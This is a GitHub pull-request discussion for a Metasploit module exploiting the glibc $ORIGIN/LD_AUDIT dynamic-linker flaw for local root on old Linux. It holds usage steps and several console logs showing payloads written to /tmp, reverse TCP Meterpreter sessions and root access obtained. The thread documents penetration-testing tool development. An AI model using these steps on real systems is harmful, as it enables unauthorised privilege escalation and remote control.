Add glibc $ORIGIN Expansion Privilege Escalation exploit

[bcoles]

Add glibc $ORIGIN Expansion Privilege Escalation exploit.

    This module attempts to gain root privileges on Linux systems by abusing
    a vulnerability in the GNU C Library (glibc) dynamic linker.

    glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not
    properly restrict use of the LD_AUDIT environment variable when loading
    setuid executables which allows control over the $ORIGIN library search
    path resulting in execution of arbitrary shared objects.

    This module opens a file descriptor to the specified suid executable via
    a hard link, then replaces the hard link with a shared object before
    instructing the linker to execute the file descriptor, resulting in
    arbitrary code execution.

    The specified setuid binary must be readable and located on the same
    file system partition as the specified writable directory.

    This module has been tested successfully on glibc version 2.5 on CentOS
    5.4 (x86_64), 2.5 on CentOS 5.5 (x86_64) and 2.12 on Fedora 13 (i386).

    RHEL 5 is reportedly affected, but untested. Some versions of ld.so
    hit a failed assertion in dl_open_worker causing exploitation to fail.

Verification

• Start msfconsole
• Get a session
• use exploit/linux/local/glibc_origin_expansion_priv_esc
• set SESSION <ID>
• run
• Verify you get a root session

Example Output

msf5 exploit(multi/handler) > use exploit/linux/local/glibc_origin_expansion_priv_esc 
msf5 exploit(linux/local/glibc_origin_expansion_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/glibc_origin_expansion_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[+] The target appears to be vulnerable
[*] Using target: Linux x86
[*] Writing '/tmp/.R5Ork' (1279 bytes) ...
[*] Writing '/tmp/.yE35DWbLd' (320 bytes) ...
[*] Writing '/tmp/.sk7Z3Vl7vJ' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (857352 bytes) to 172.16.191.138
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.138:59187) at 2018-01-27 04:21:24 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : fedora13.localdomain
OS           : Fedora 13 (Linux 2.6.33.3-85.fc13.i686.PAE)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

[wvu-r7]

This one's a "classic" fave! ;)

[bcoles]

Delayed pending fix for #9482

[h00die]

Ubuntu 10.04 x64

msf exploit(linux/local/glibc_origin_expansion_priv_esc) > set verbose 1
verbose => true
msf exploit(linux/local/glibc_origin_expansion_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] GNU C Library version 2.11.1 is vulnerable
[-] Exploit failed: NoMethodError undefined method `setuid?' for #<Msf::Modules::Mod6578706c6f69742f6c696e75782f6c6f63616c2f676c6962635f6f726967696e5f657870616e73696f6e5f707269765f657363::MetasploitModule:0x0000562a6e7543d0>
Did you mean?  setup
[*] Exploit completed, but no session was created.

[bcoles]

@h00die setuid? was added to lib/msf/core/post/file.rb a couple of weeks ago in #9446.

Edit: Yeah, this didn't work on Ubuntu. It hit a failed assertion in dl_open_worker.

[h00die]

did a rebase, compiles now.
Ubuntu 10.04 x64 should be vuln according to the docs that are linked, but it killed my original session for me.

msf5 exploit(linux/local/glibc_origin_expansion_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] GNU C Library version 2.11.1 is vulnerable
[+] /bin/ping is setuid
[+] /bin/ping is readable
[+] The target appears to be vulnerable
[+] '/bin/ping' and '/tmp' are located on the same partition
[*] System architecture is x86_64
[*] Using target: Linux x64
[*] Writing '/tmp/.igpZGagV' (1913 bytes) ...
[*] Max line length is 65537
[*] Writing 1913 bytes in 1 chunks of 4371 bytes (octal-encoded), using printf
[*] Writing '/tmp/.yxtnoClTtS' (311 bytes) ...
[*] Max line length is 65537
[*] Writing 311 bytes in 1 chunks of 1093 bytes (octal-encoded), using printf
[*] Writing '/tmp/.5O3IOFVyX' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] 2.2.2.2 - Command shell session 1 closed.  Reason: Died from EOFError
[*] 2.2.2.2 - Command shell session 1 closed.
[-] Failed to delete /tmp/.igpZGagV: closed stream
[-] Failed to delete /tmp/.yxtnoClTtS: closed stream
[-] Failed to delete /tmp/.PZuXhOp: closed stream
[-] Failed to delete /tmp/.5O3IOFVyX: closed stream
[*] Exploit completed, but no session was created.

(waiting on my centos 5.5 to finish downloading)

[h00die]

since the check worked out correctly, local exploit suggester may suggest it. Maybe add in a check to fail on Ubuntu?

[bcoles]

I'm hesitant to fail on all versions of Ubuntu. As you suggest, documentation suggests that Ubuntu is affected.

Killing the session is bad. I might have to implement the same work around as the other glibc module:

    # The echo at the end of the command is required
    # else the original session may die
    output = cmd_exec "#{exp_path}& echo "

This only seems to be necessary for shell sessions.

[h00die]

I have to do some ESX patching, then get centos 5.5 installed, so you got a little to test changes

[bcoles]

Latest commit seems to have fixed premature session termination for shell sessions on Ubuntu.

As for check - the module currently returns CheckCode::Appears as the highest level of certainty, which seems appropriate, but I could add a fallback to CheckCode::Detected for Ubuntu if you think that would be better.

[h00die]

centos 5.5 doesn't play nice on my esxi, no mouse, no nic, and that was as far as I cared to go. Switching to Fedora 13, hopefully better results.

[h00die]

confirmed ubuntu session is no longer killed

[bcoles]

Excellent. The premature termination of shell sessions upon backgrounding a program during a cmd_exec call is possibly (likely?) a bug with cmd_exec. I haven't had time to investigate and create an issue on the tracker, but the issue only seems to appear on shell sessions, and only on old *nix systems.

[h00die]

Fedora 13 was a good test

msf5 exploit(linux/local/glibc_origin_expansion_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] GNU C Library version 2.12 is vulnerable
[+] /bin/ping is setuid
[+] /bin/ping is readable
[+] The target appears to be vulnerable
[+] '/bin/ping' and '/tmp' are located on the same partition
[*] System architecture is x86_64
[*] Using target: Linux x64
[*] Writing '/tmp/.GGqazPNz8' (1913 bytes) ...
[*] Max line length is 65537
[*] Writing 1913 bytes in 1 chunks of 4366 bytes (octal-encoded), using printf
[*] Writing '/tmp/.t7vLjiShY' (332 bytes) ...
[*] Max line length is 65537
[*] Writing 332 bytes in 1 chunks of 1148 bytes (octal-encoded), using printf
[*] Writing '/tmp/.y7OwDC' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 192.168.2.32
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:56281) at 2018-02-10 07:01:50 -0500
[+] Deleted /tmp/.t7vLjiShY
[+] Deleted /tmp/.SBC8HlI13
[+] Deleted /tmp/.y7OwDC

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : Fedora 13 (Linux 2.6.33.3-85.fc13.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

[h00die]

also good on meterp for fedora13

[h00die]

38252e4#diff-8b2f582663348d9c4415bb7a16ec9e91

[h00die]

merged this, not sure why (unless its just delayed) its still saying open....

It may be worth throwing in a comment to the docs about Ubuntu being vulnerable, but the exploit not working against it. Figured that could be a quick add to the docs, and didn't want to hold this up any longer over a one liner.

[h00die]

Release Notes

The exploits/linux/local/glibc_origin_expansion_priv_esc module has been added to the framework. This module abuses a vulnerability in the GNU C Library (glibc) dynamic linker on older (Fedora 13, Centos 5.5) operating systems for privilege escalation.

[h00die]

ah, i think yesterday i may have done a rebase to get that setuid? function, but may have messed it up which may have messed up linking the merge correctly

[bcoles]

Thanks. Yeah I'd say that's what happened.

I'm not sure if it's best practice for a PR author to rebase within a PR? It would drag the merge into master. Not a big deal I guess.

I'll create a separate PR for the minor doco updates.

Closed this PR.